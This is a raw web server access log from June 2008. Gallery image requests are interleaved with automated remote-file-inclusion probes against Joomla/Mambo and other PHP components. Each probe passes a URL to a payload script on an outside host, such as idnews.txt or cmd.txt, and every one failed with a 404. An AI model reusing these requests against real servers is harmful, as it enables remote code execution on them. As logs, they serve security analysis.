76.212.153.163 - - [09/Jun/2008:11:03:14 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0160.jpg HTTP/1.1" 200 386726 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:03:14 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0096.jpg HTTP/1.1" 200 43464 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
89.104.78.250 - - [09/Jun/2008:11:03:23 -0700] "GET /logs/access.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:03:29 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0167.jpg HTTP/1.1" 200 399577 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:03:30 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0092.jpg HTTP/1.1" 200 538619 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
217.22.228.144 - - [09/Jun/2008:11:03:33 -0700] "GET /logs/access.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.224.55.172 - - [09/Jun/2008:11:03:43 -0700] "GET /logs/access_080215.log/page.php?doc=http://www.onyxclub.ru/administrator/components/com_remository/if.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:03:43 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0156.jpg HTTP/1.1" 200 380022 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
193.224.55.172 - - [09/Jun/2008:11:03:43 -0700] "GET /page.php?doc=http://www.onyxclub.ru/administrator/components/com_remository/if.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.224.55.172 - - [09/Jun/2008:11:03:44 -0700] "GET /logs/page.php?doc=http://www.onyxclub.ru/administrator/components/com_remository/if.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:03:45 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0101.jpg HTTP/1.1" 200 483322 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
89.104.78.250 - - [09/Jun/2008:11:03:52 -0700] "GET /logs/access_080211.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:11:03:52 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:11:03:52 -0700] "GET /logs/access_080211.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:11:03:53 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:11:03:53 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:11:03:53 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:03:57 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0177.jpg HTTP/1.1" 200 348079 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:03:58 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0119.jpg HTTP/1.1" 200 402743 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:04:10 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0149.jpg HTTP/1.1" 200 385604 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:04:12 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0007.jpg HTTP/1.1" 200 413075 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:04:24 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0139_0.jpg HTTP/1.1" 200 344118 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
213.194.149.215 - - [09/Jun/2008:11:04:24 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.194.149.215 - - [09/Jun/2008:11:04:24 -0700] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:04:26 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0022.jpg HTTP/1.1" 200 477179 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
89.104.78.250 - - [09/Jun/2008:11:04:29 -0700] "GET /logs/access_080103.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:11:04:35 -0700] "GET /logs/access_071230.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:11:04:36 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:11:04:36 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:04:37 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0172.jpg HTTP/1.1" 200 364812 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:04:40 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0008.jpg HTTP/1.1" 200 407403 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
195.54.9.218 - - [09/Jun/2008:11:04:42 -0700] "GET /logs/access_080228.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [09/Jun/2008:11:04:43 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [09/Jun/2008:11:04:44 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:04:51 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0143.jpg HTTP/1.1" 200 332772 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:04:54 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0036.jpg HTTP/1.1" 200 378857 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:05:05 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0150.jpg HTTP/1.1" 200 378254 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:05:07 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0021.jpg HTTP/1.1" 200 360229 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:05:18 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0142.jpg HTTP/1.1" 200 309100 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:05:21 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0104.jpg HTTP/1.1" 200 449093 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
207.218.234.146 - - [09/Jun/2008:11:05:24 -0700] "GET /logs/access_071218.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:11:05:24 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:11:05:24 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.54.9.218 - - [09/Jun/2008:11:05:26 -0700] "GET /logs/access_080117.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.130.242.48 - - [09/Jun/2008:11:05:29 -0700] "GET /logs//load_lang.php?_SERWEB[configdir]=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [09/Jun/2008:11:05:30 -0700] "GET //load_lang.php?_SERWEB[configdir]=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:05:32 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0137_0.jpg HTTP/1.1" 200 385301 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
203.130.242.48 - - [09/Jun/2008:11:05:32 -0700] "GET /logs/access.log/plugins/payment/verotel/verotel.inc.php?config[Broot_dir]http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [09/Jun/2008:11:05:33 -0700] "GET /plugins/payment/verotel/verotel.inc.php?config[Broot_dir]http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.48 - - [09/Jun/2008:11:05:33 -0700] "GET /logs/plugins/payment/verotel/verotel.inc.php?config[Broot_dir]http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:05:35 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0028.jpg HTTP/1.1" 200 490791 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
217.22.228.144 - - [09/Jun/2008:11:05:41 -0700] "GET /logs/access_080103.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.139.209.245 - - [09/Jun/2008:11:05:45 -0700] "GET /xmlrpc.php HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
209.139.209.245 - - [09/Jun/2008:11:05:45 -0700] "GET /logs/xmlrpc.php HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:05:46 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0155.jpg HTTP/1.1" 200 371716 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:05:49 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0054.jpg HTTP/1.1" 200 489642 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
89.104.78.250 - - [09/Jun/2008:11:05:54 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:11:05:54 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:11:05:55 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:05:59 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0152.jpg HTTP/1.1" 200 335197 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
217.22.228.144 - - [09/Jun/2008:11:05:59 -0700] "GET /logs/access_080211.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:11:06:00 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:11:06:00 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:06:03 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0097.jpg HTTP/1.1" 200 349511 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
91.43.83.143 - - [09/Jun/2008:11:06:05 -0700] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dom.dream-irc.loc/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
195.54.9.218 - - [09/Jun/2008:11:06:10 -0700] "GET /logs/access_080219.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [09/Jun/2008:11:06:10 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [09/Jun/2008:11:06:11 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:06:14 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0147.jpg HTTP/1.1" 200 421697 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
217.22.228.144 - - [09/Jun/2008:11:06:17 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:11:06:17 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:11:06:17 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:06:18 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0091.jpg HTTP/1.1" 200 528876 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
208.71.170.173 - - [09/Jun/2008:11:06:18 -0700] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:11:06:19 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:11:06:19 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:11:06:26 -0700] "GET /logs/access_080103.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:06:27 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0174.jpg HTTP/1.1" 200 310022 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:06:31 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0110.jpg HTTP/1.1" 200 356861 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
217.22.228.144 - - [09/Jun/2008:11:06:38 -0700] "GET /logs/access_080225.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:06:41 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0161.jpg HTTP/1.1" 200 448957 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
89.104.78.250 - - [09/Jun/2008:11:06:44 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:06:45 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0127.jpg HTTP/1.1" 200 426309 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
89.104.78.250 - - [09/Jun/2008:11:06:45 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:11:06:46 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.224.55.172 - - [09/Jun/2008:11:06:49 -0700] "GET /logs/access_080331.log/page.php?doc=http://www.onyxclub.ru/administrator/components/com_remository/if.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:06:54 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0159.jpg HTTP/1.1" 200 381231 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
195.54.9.218 - - [09/Jun/2008:11:06:58 -0700] "GET /logs/access_080215.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:06:59 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0123.jpg HTTP/1.1" 200 552331 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
217.22.228.144 - - [09/Jun/2008:11:07:02 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:11:07:02 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:07:08 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0164.jpg HTTP/1.1" 200 386584 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:07:13 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0070.jpg HTTP/1.1" 200 453368 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:07:21 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0158.jpg HTTP/1.1" 200 306017 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:07:27 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0027.jpg HTTP/1.1" 200 494363 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
91.43.83.143 - - [09/Jun/2008:11:07:29 -0700] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dom.dream-irc.loc/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:07:35 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0166.jpg HTTP/1.1" 200 298247 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:07:40 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0057.jpg HTTP/1.1" 200 386259 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
66.249.67.79 - - [09/Jun/2008:11:07:42 -0700] "GET /blog/wp-content/gallery/crestoc-2008/thumbs/thumbs_img_0006.jpg HTTP/1.1" 200 11282 "-" "Googlebot-Image/1.0" "dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:07:48 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0169.jpg HTTP/1.1" 200 387384 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
208.71.170.173 - - [09/Jun/2008:11:07:52 -0700] "GET /logs/access_080103.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:07:54 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0102.jpg HTTP/1.1" 200 477043 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
217.22.228.144 - - [09/Jun/2008:11:07:55 -0700] "GET /logs/access_080103.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.212.153.163 - - [09/Jun/2008:11:08:02 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0141.jpg HTTP/1.1" 200 378474 "http://dmulk.com/blog/wp-content/plugins/nggallery/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "dmulk.com"
66.230.197.170 - - [09/Jun/2008:11:08:06 -0700] "GET /logs/access.log/plugins/payment/verotel/verotel.inc.php?config[Broot_dir]http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.170 - - [09/Jun/2008:11:08:06 -0700] "GET /plugins/payment/verotel/verotel.inc.php?config[Broot_dir]http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.170 - - [09/Jun/2008:11:08:07 -0700] "GET /logs/plugins/payment/verotel/verotel.inc.php?config[Broot_dir]http://landleben.bieswang.de/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
